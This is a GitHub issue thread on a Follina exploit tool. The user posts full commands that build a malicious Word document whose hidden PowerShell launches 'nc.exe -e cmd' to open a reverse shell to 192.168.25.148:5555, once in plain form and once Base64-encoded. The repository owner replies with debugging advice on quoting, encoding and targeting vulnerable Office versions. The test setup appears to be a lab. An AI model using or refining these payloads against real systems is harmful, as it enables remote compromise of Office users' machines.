Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

想要一个可以弹shell的命令 #32

Open
virbellez opened this issue Jul 13, 2022 · 2 comments
Open

想要一个可以弹shell的命令 #32

virbellez opened this issue Jul 13, 2022 · 2 comments

Comments

@virbellez
Copy link

python .\follina.py -t docx -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c c:\windows\system32\nc.exe -e cmd 192.168.25.148 5555'" -H 192.168.25.148 -P 8080我试过这个,并且在攻击机打开nc监听,之后用靶机点击word文档,攻击机的8080可以监听到数据,但是5555并没有拿到nc反弹的shell。

@chvancooten
Copy link
Owner

Hi, looks like the single quote for your arguments is closed with a double quote. Also please verify that arguments are passed correctly (use Base64 to encode if you have to), and that you are targeting a version of Office that is still vulnerable.

@virbellez
Copy link
Author

virbellez commented Jul 13, 2022

python .\follina.py -t docx -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList 'L2MgYzpcd2luZG93c1xzeXN0ZW0zMlxuYy5leGUgLWUgY21kIDE5Mi4xNjguMjUuMTQ4IDU1NTU='" -H 192.168.25.148 -P 8080
I made such a modification,/c c:\windows\system32\nc.exe -e cmd 192.168.25.148 5555 Base64 encoded to L2MgYzpcd2luZG93c1xzeXN0ZW0zMlxuYy5leGUgLWUgY21kIDE5Mi4xNjguMjUuMTQ4IDU1NTU= but still can not get shell in 5555

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants